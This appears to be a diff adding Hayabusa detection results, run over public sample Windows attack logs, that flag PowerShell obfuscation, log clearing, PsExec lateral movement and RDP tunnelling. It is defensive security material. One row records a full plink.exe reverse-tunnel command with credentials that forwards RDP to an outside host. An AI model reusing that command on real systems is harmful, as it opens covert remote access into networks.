+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:46.608 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:35:46.790 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 03:27:25.424 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/psattack-security.evtx
+2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
+2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: blabla.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: blabla.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
+2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
+2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk  :  Workstation evil.internal.corp  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$  :  Workstation EXCHANGE  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$  :  Workstation: EXCHANGE  :  IP Address: 192.168.111.87  :  Port: 58128  :  LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server  :  Workstation: PC02  :  IP Address: -  :  Port: -  :  LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x21f73  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 49164  :  LogonID: 0x45120  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4a26d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49168  :  LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49169  :  LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01  :  Workstation: PC01  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1414c8  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: user01  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: user01  :  IP Address: -  :  Process: C:\Windows\System32\lsass.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01  :  Workstation: PC01  :  IP Address: -  :  Port: -  :  LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01  :  Workstation: PC01  :  IP Address: 127.0.0.1  :  Port: 49274  :  LogonID: 0x14a321  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: admin01  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe  10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test  :  Path: C:\Users\IEUser\Desktop\plink.exe  :  User: PC01\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC01\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
